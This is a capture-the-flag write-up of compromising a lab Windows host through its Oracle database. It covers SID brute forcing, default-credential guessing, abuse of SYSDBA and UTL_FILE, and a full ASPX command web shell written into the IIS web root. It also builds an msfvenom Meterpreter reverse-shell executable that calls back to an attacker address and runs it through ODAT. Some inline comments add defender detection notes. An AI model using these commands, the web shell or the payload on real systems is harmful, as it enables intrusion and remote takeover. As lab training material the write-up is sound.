Nmap scan

PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp  open  oracle-tns   Oracle TNS listener 11.2.0.2.0 (unauthorized)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49158/tcp open  msrpc        Microsoft Windows RPC
49160/tcp open  oracle-tns   Oracle TNS listener (requires service name)
49161/tcp open  msrpc        Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Since it's running an Oracle DB service, I can either use Metasploit or ODAT. I will show both.

ODAT

Once installed, I will start the ODAT sidguesser to find potential SIDs to brute force.

ODAT sidguesser

./odat.py sidguesser -s 10.10.10.82 -p 1521

Metasploit sid_brute

use auxiliary/scanner/oracle/sid_brute
[+] 10.10.10.82:1521      - 10.10.10.82:1521 Oracle - 'XE' is valid

The ODAT passwordguesser uses an outdated wordlist that's all caps, so I will use the Metasploit wordlist instead.

cp /usr/share/metasploit-framework/data/wordlists/oracle_default_userpass.txt .
mv oracle_default_userpass.txt accounts/accounts.txt

Since oracle_default_userpass.txt separates username and password with a space, I will use a regex substitution to turn that space into a `/`.

With vim: :%s/ /\//g

Now run the ODAT passwordguesser

./odat.py passwordguesser -s 10.10.10.82 -d XE
[+] Valid credentials found: scott/tiger.

Manual method of obtaining a low-priv shell

Now access the oracle database
sqlplus64 scott/tiger@10.10.10.82:1521/XE

SQL> select * from session_privs;

PRIVILEGE
----------------------------------------
CREATE SESSION
CREATE TABLE
CREATE CLUSTER
CREATE SEQUENCE
CREATE PROCEDURE
CREATE TRIGGER
CREATE TYPE
CREATE OPERATOR
CREATE INDEXTYPE

9 rows selected.

SQL> select * from user_role_privs;

USERNAME                       GRANTED_ROLE                   ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SCOTT                          CONNECT                        NO  YES NO
SCOTT                          RESOURCE                       NO  YES NO

Access the DB as a system admin (SYSDBA). The same default scott/tiger credentials are accepted with `as sysdba`, which is the real misconfiguration here.
sqlplus64 scott/tiger@10.10.10.82:1521/XE as sysdba

Read the default IIS page from the DB

-- Read the first line of the default IIS start page through the database.
-- Run in the SYSDBA session opened above; UTL_FILE reads the server's
-- filesystem with the rights of the Oracle service account, so a database
-- session reaching into the web root is the event a defender should alert on
-- (and the reason UTL_FILE/directory grants should be tightly restricted).
declare 
        f utl_file.file_type;   -- file handle returned by fopen
        s varchar(200);         -- receives one line of the file (200-char buffer)
begin
        -- The location argument is a literal OS path, not a DIRECTORY object
        -- name; presumably permitted by the instance's utl_file_dir setting — confirm.
        f := utl_file.fopen('/inetpub/wwwroot', 'iisstart.htm', 'R');
        utl_file.get_line(f,s);   -- reads a single line only
        utl_file.fclose(f);
        dbms_output.put_line(s);  -- output is only shown after "set serveroutput on" (see below)
end;
SQL> set serveroutput ON
SQL> /
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

PL/SQL procedure successfully completed.

Write a test file to wwwroot

-- Proof that UTL_FILE can also write into the IIS web root: drops a text file
-- containing 'Test'. Write access here is what turns the database foothold into
-- a file drop in the web root; monitoring for new files under wwwroot created by
-- the Oracle service account would catch this step.
declare
        f utl_file.file_type;        -- file handle returned by fopen
        s varchar(5000) := 'Test';   -- file body to write
begin
        f := utl_file.fopen('/inetpub/wwwroot', 'helloworld.txt','W');   -- 'W' = write mode
        utl_file.put_line(f,s);
        utl_file.fclose(f);
end;

Using '/usr/share/webshells/aspx/cmdasp.aspx'. It needs to be modified to make the file smaller so it fits in a single varchar literal in the PL/SQL block below.

Strip the newlines: sed -z 's/\n//g' cmdasp.aspx

Modified aspx shell

<%@ Page Language="C#" Debug="true" Trace="false" %><%@ Import Namespace="System.Diagnostics" %><%@ Import Namespace="System.IO" %><script Language="c#" runat="server">void Page_Load(object sender, EventArgs e){}string ExcuteCmd(string arg){ProcessStartInfo psi = new ProcessStartInfo();psi.FileName = "cmd.exe";psi.Arguments = "/c "+arg;psi.RedirectStandardOutput = true;psi.UseShellExecute = false;Process p = Process.Start(psi);StreamReader stmrdr = p.StandardOutput;string s = stmrdr.ReadToEnd();stmrdr.Close();return s;}void cmdExe_Click(object sender, System.EventArgs e){Response.Write("<pre>");Response.Write(Server.HtmlEncode(ExcuteCmd(txtArg.Text)));Response.Write("</pre>");}</script><HTML><body ><form id="cmd" method="post" runat="server"><asp:TextBox id="txtArg" runat="server" Width="250px"></asp:TextBox><asp:Button id="testing" runat="server" Text="excute" OnClick="cmdExe_Click"></asp:Button><asp:Label id="lblText" runat="server">Command:</asp:Label></form></body></HTML>

The PL/SQL block that writes the shell

-- Same UTL_FILE write as the previous block, but the body is the single-line
-- cmdasp.aspx page and the target name is shell.aspx, which IIS serves as an
-- executable page. The newline-stripped form is needed so the whole page fits in
-- one varchar literal (5000 chars here).
-- Defender notes: on the database side the signal is a SYSDBA session using
-- UTL_FILE against the web root; on the host side it is a new .aspx under
-- wwwroot written by the Oracle service process, followed by the IIS worker
-- process spawning cmd.exe (the page's ProcessStartInfo targets "cmd.exe").
declare
        f utl_file.file_type;   -- file handle returned by fopen
        -- Full page content as one literal; must stay within the 5000-char buffer.
        s varchar(5000) := '<%@ Page Language="C#" Debug="true" Trace="false" %><%@ Import Namespace="System.Diagnostics" %><%@ Import Namespace="System.IO" %><script Language="c#" runat="server">void Page_Load(object sender, EventArgs e){}string ExcuteCmd(string arg){ProcessStartInfo psi = new ProcessStartInfo();psi.FileName = "cmd.exe";psi.Arguments = "/c "+arg;psi.RedirectStandardOutput = true;psi.UseShellExecute = false;Process p = Process.Start(psi);StreamReader stmrdr = p.StandardOutput;string s = stmrdr.ReadToEnd();stmrdr.Close();return s;}void cmdExe_Click(object sender, System.EventArgs e){Response.Write("<pre>");Response.Write(Server.HtmlEncode(ExcuteCmd(txtArg.Text)));Response.Write("</pre>");}</script><HTML><body ><form id="cmd" method="post" runat="server"><asp:TextBox id="txtArg" runat="server" Width="250px"></asp:TextBox><asp:Button id="testing" runat="server" Text="excute" OnClick="cmdExe_Click"></asp:Button><asp:Label id="lblText" runat="server">Command:</asp:Label></form></body></HTML>';
begin
        f := utl_file.fopen('/inetpub/wwwroot', 'shell.aspx','W');   -- 'W' = write mode
        utl_file.put_line(f,s);
        utl_file.fclose(f);
end;

Obtaining a SYSTEM-privilege shell using ODAT

Generate an exe using msfvenom
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.19 LPORT=5555 -f exe -o shell.exe

Uploading our malicious exe to the /temp folder on the victim machine
./odat.py utlfile -s 10.10.10.82 --sysdba -d XE -U scott -P tiger --putFile /temp shelly.exe ../shell.exe

Now execute the uploaded exe on the victim machine (after the Metasploit listener is set up)
./odat.py externaltable -s 10.10.10.82 -U scott -P tiger -d XE --sysdba --exec /temp shelly.exe

user.txt: 92ede778a1cc8d<redacted>
root.txt: cd39ea0af657a4<redacted>

Additional Privesc methods

Rotten Potato RottenPotatoGithub

Dropbox -> .dmp -> volatility -> extract NTLM hash of users